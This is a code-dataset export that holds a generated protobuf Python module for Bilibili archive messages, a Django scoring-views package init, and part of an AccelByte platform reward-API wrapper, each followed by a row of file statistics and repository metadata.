name='forward', full_name='bilibili.app.archive.v1.Arc.forward', index=19,
number=20, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rights', full_name='bilibili.app.archive.v1.Arc.rights', index=20,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='author', full_name='bilibili.app.archive.v1.Arc.author', index=21,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='stat', full_name='bilibili.app.archive.v1.Arc.stat', index=22,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='reportResult', full_name='bilibili.app.archive.v1.Arc.reportResult', index=23,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dynamic', full_name='bilibili.app.archive.v1.Arc.dynamic', index=24,
number=25, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='firstCid', full_name='bilibili.app.archive.v1.Arc.firstCid', index=25,
number=26, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dimension', full_name='bilibili.app.archive.v1.Arc.dimension', index=26,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='staffInfo', full_name='bilibili.app.archive.v1.Arc.staffInfo', index=27,
number=28, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='seasonId', full_name='bilibili.app.archive.v1.Arc.seasonId', index=28,
number=29, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='attributeV2', full_name='bilibili.app.archive.v1.Arc.attributeV2', index=29,
number=30, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=67,
serialized_end=746,
)
_AUTHOR = _descriptor.Descriptor(
name='Author',
full_name='bilibili.app.archive.v1.Author',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='mid', full_name='bilibili.app.archive.v1.Author.mid', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='bilibili.app.archive.v1.Author.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='face', full_name='bilibili.app.archive.v1.Author.face', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=748,
serialized_end=797,
)
_DIMENSION = _descriptor.Descriptor(
name='Dimension',
full_name='bilibili.app.archive.v1.Dimension',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='width', full_name='bilibili.app.archive.v1.Dimension.width', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='height', full_name='bilibili.app.archive.v1.Dimension.height', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rotate', full_name='bilibili.app.archive.v1.Dimension.rotate', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=799,
serialized_end=857,
)
_PAGE = _descriptor.Descriptor(
name='Page',
full_name='bilibili.app.archive.v1.Page',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='cid', full_name='bilibili.app.archive.v1.Page.cid', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='page', full_name='bilibili.app.archive.v1.Page.page', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='from', full_name='bilibili.app.archive.v1.Page.from', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='part', full_name='bilibili.app.archive.v1.Page.part', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='duration', full_name='bilibili.app.archive.v1.Page.duration', index=4,
number=5, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vid', full_name='bilibili.app.archive.v1.Page.vid', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='desc', full_name='bilibili.app.archive.v1.Page.desc', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='webLink', full_name='bilibili.app.archive.v1.Page.webLink', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dimension', full_name='bilibili.app.archive.v1.Page.dimension', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=860,
serialized_end=1038,
)
_RIGHTS = _descriptor.Descriptor(
name='Rights',
full_name='bilibili.app.archive.v1.Rights',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='bp', full_name='bilibili.app.archive.v1.Rights.bp', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='elec', full_name='bilibili.app.archive.v1.Rights.elec', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='download', full_name='bilibili.app.archive.v1.Rights.download', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='movie', full_name='bilibili.app.archive.v1.Rights.movie', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pay', full_name='bilibili.app.archive.v1.Rights.pay', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hd5', full_name='bilibili.app.archive.v1.Rights.hd5', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='noReprint', full_name='bilibili.app.archive.v1.Rights.noReprint', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autoplay', full_name='bilibili.app.archive.v1.Rights.autoplay', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ugcPay', full_name='bilibili.app.archive.v1.Rights.ugcPay', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='isCooperation', full_name='bilibili.app.archive.v1.Rights.isCooperation', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ugcPayPreview', full_name='bilibili.app.archive.v1.Rights.ugcPayPreview', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='noBackground', full_name='bilibili.app.archive.v1.Rights.noBackground', index=11,
number=12, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1041,
serialized_end=1255,
)
_STAFFINFO = _descriptor.Descriptor(
name='StaffInfo',
full_name='bilibili.app.archive.v1.StaffInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='mid', full_name='bilibili.app.archive.v1.StaffInfo.mid', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='title', full_name='bilibili.app.archive.v1.StaffInfo.title', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='attribute', full_name='bilibili.app.archive.v1.StaffInfo.attribute', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1257,
serialized_end=1315,
)
_STAT = _descriptor.Descriptor(
name='Stat',
full_name='bilibili.app.archive.v1.Stat',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='aid', full_name='bilibili.app.archive.v1.Stat.aid', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='view', full_name='bilibili.app.archive.v1.Stat.view', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='danmaku', full_name='bilibili.app.archive.v1.Stat.danmaku', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='reply', full_name='bilibili.app.archive.v1.Stat.reply', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='fav', full_name='bilibili.app.archive.v1.Stat.fav', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='coin', full_name='bilibili.app.archive.v1.Stat.coin', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='share', full_name='bilibili.app.archive.v1.Stat.share', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='nowRank', full_name='bilibili.app.archive.v1.Stat.nowRank', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hisRank', full_name='bilibili.app.archive.v1.Stat.hisRank', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='like', full_name='bilibili.app.archive.v1.Stat.like', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dislike', full_name='bilibili.app.archive.v1.Stat.dislike', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1318,
serialized_end=1490,
)
_ARC.fields_by_name['rights'].message_type = _RIGHTS
_ARC.fields_by_name['author'].message_type = _AUTHOR
_ARC.fields_by_name['stat'].message_type = _STAT
_ARC.fields_by_name['dimension'].message_type = _DIMENSION
_ARC.fields_by_name['staffInfo'].message_type = _STAFFINFO
_PAGE.fields_by_name['dimension'].message_type = _DIMENSION
DESCRIPTOR.message_types_by_name['Arc'] = _ARC
DESCRIPTOR.message_types_by_name['Author'] = _AUTHOR
DESCRIPTOR.message_types_by_name['Dimension'] = _DIMENSION
DESCRIPTOR.message_types_by_name['Page'] = _PAGE
DESCRIPTOR.message_types_by_name['Rights'] = _RIGHTS
DESCRIPTOR.message_types_by_name['StaffInfo'] = _STAFFINFO
DESCRIPTOR.message_types_by_name['Stat'] = _STAT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Arc = _reflection.GeneratedProtocolMessageType('Arc', (_message.Message,), {
'DESCRIPTOR' : _ARC,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Arc)
})
_sym_db.RegisterMessage(Arc)
Author = _reflection.GeneratedProtocolMessageType('Author', (_message.Message,), {
'DESCRIPTOR' : _AUTHOR,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Author)
})
_sym_db.RegisterMessage(Author)
Dimension = _reflection.GeneratedProtocolMessageType('Dimension', (_message.Message,), {
'DESCRIPTOR' : _DIMENSION,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Dimension)
})
_sym_db.RegisterMessage(Dimension)
Page = _reflection.GeneratedProtocolMessageType('Page', (_message.Message,), {
'DESCRIPTOR' : _PAGE,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Page)
})
_sym_db.RegisterMessage(Page)
Rights = _reflection.GeneratedProtocolMessageType('Rights', (_message.Message,), {
'DESCRIPTOR' : _RIGHTS,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Rights)
})
_sym_db.RegisterMessage(Rights)
StaffInfo = _reflection.GeneratedProtocolMessageType('StaffInfo', (_message.Message,), {
'DESCRIPTOR' : _STAFFINFO,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.StaffInfo)
})
_sym_db.RegisterMessage(StaffInfo)
Stat = _reflection.GeneratedProtocolMessageType('Stat', (_message.Message,), {
'DESCRIPTOR' : _STAT,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Stat)
})
_sym_db.RegisterMessage(Stat)
# @@protoc_insertion_point(module_scope)
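# Usage sketch: a minimal, hand-written example of how the generated message
# classes above are typically used. The field names come from the descriptors
# in this module; the values are placeholders.
if __name__ == "__main__":
    arc = Arc(
        author=Author(mid=1, name="uploader", face="https://example.com/face.png"),
        dimension=Dimension(width=1920, height=1080, rotate=0),
        seasonId=42,
    )
    data = arc.SerializeToString()    # encode to protobuf wire format
    roundtrip = Arc.FromString(data)  # decode back into a message
    assert roundtrip.author.name == "uploader"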
| 51.312418 | 3,191 | 0.741453 | 5,436 | 39,254 | 5.07947 | 0.055004 | 0.06374 | 0.098399 | 0.073881 | 0.861908 | 0.83279 | 0.818666 | 0.736383 | 0.719325 | 0.714544 | 0 | 0.04714 | 0.128318 | 39,254 | 764 | 3,192 | 51.379581 | 0.759827 | 0.018138 | 0 | 0.745833 | 1 | 0.001389 | 0.183907 | 0.159429 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.005556 | 0 | 0.005556 | 0.002778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
76793e22552c612ee43e92061b97561ea83bb285 | 1,431 | py | Python | scoring/views/__init__.py | alextenczar/3-julian-alex | 9f2aa71769dd6eb6e7dd9e63236c3e7874f02de7 | [
"MIT"
] | null | null | null | scoring/views/__init__.py | alextenczar/3-julian-alex | 9f2aa71769dd6eb6e7dd9e63236c3e7874f02de7 | [
"MIT"
] | 3 | 2021-06-09T19:34:38.000Z | 2022-02-10T12:25:27.000Z | scoring/views/__init__.py | alextenczar/3-julian-alex | 9f2aa71769dd6eb6e7dd9e63236c3e7874f02de7 | [
"MIT"
] | null | null | null | from scoring.views.home import *
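# This package-level module re-exports all of the view submodules below so
# that `from scoring.views import *` exposes every view in one namespace.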
from scoring.views.display.display_judges import *
from scoring.views.display.display_projects import *
from scoring.views.display.display_students import *
from scoring.views.display.display_judge_assignments import *
from scoring.views.display.display_scoring import *
from scoring.views.import_m.import_data import *
from scoring.views.import_m.import_file import *
from scoring.views.import_m.import_project import *
from scoring.views.import_m.import_student import *
from scoring.views.import_m.import_judge_assignment import *
from scoring.views.calc_sort.cal_average_score import *
from scoring.views.calc_sort.cal_avg_01 import *
from scoring.views.calc_sort.cal_avg_z_score import *
from scoring.views.calc_sort.cal_isef_score import *
from scoring.views.calc_sort.cal_scaled_rank import *
from scoring.views.calc_sort.cal_scaled_score import *
from scoring.views.calc_sort.cal_scaled_z_score import *
from scoring.views.calc_sort.cal_z_score import *
from scoring.views.calc_sort.calculate_scores import *
from scoring.views.calc_sort.sort_avg_01_rank import *
from scoring.views.calc_sort.sort_category_rank import *
from scoring.views.calc_sort.sort_isef_rank import *
from scoring.views.calc_sort.sort_judge_rank import *
from scoring.views.calc_sort.sort_rank import *
from scoring.views.calc_sort.sort_z_score_rank import *
from scoring.views.export_judge_assignment import *
| 42.088235 | 61 | 0.846261 | 226 | 1,431 | 5.066372 | 0.141593 | 0.259389 | 0.377293 | 0.499563 | 0.838428 | 0.815721 | 0.658515 | 0.443668 | 0.144978 | 0 | 0 | 0.003037 | 0.079665 | 1,431 | 33 | 62 | 43.363636 | 0.866363 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
769fd52caf95a3967688f65c955363602f6311d2 | 13,849 | py | Python | accelbyte_py_sdk/api/platform/wrappers/_reward.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | accelbyte_py_sdk/api/platform/wrappers/_reward.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | 1 | 2021-10-13T03:46:58.000Z | 2021-10-13T03:46:58.000Z | accelbyte_py_sdk/api/platform/wrappers/_reward.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | # Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import HeaderStr
from ....core import get_namespace as get_services_namespace
from ....core import run_request
from ....core import run_request_async
from ....core import same_doc_as
from ..models import ConditionMatchResult
from ..models import ErrorEntity
from ..models import EventPayload
from ..models import RewardCreate
from ..models import RewardInfo
from ..models import RewardPagingSlicedResult
from ..models import RewardUpdate
from ..models import ValidationErrorEntity
from ..operations.reward import CheckEventCondition
from ..operations.reward import CreateReward
from ..operations.reward import DeleteReward
from ..operations.reward import ExportRewards
from ..operations.reward import GetReward
from ..operations.reward import GetReward1
from ..operations.reward import GetRewardByCode
from ..operations.reward import ImportRewards
from ..operations.reward import QueryRewards
from ..operations.reward import QueryRewardsSortByEnum
from ..operations.reward import QueryRewards1
from ..operations.reward import QueryRewards1SortByEnum
from ..operations.reward import UpdateReward
@same_doc_as(CheckEventCondition)
def check_event_condition(reward_id: str, body: Optional[EventPayload] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CheckEventCondition.create(
reward_id=reward_id,
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CheckEventCondition)
async def check_event_condition_async(reward_id: str, body: Optional[EventPayload] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CheckEventCondition.create(
reward_id=reward_id,
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CreateReward)
def create_reward(body: Optional[RewardCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CreateReward.create(
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CreateReward)
async def create_reward_async(body: Optional[RewardCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CreateReward.create(
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
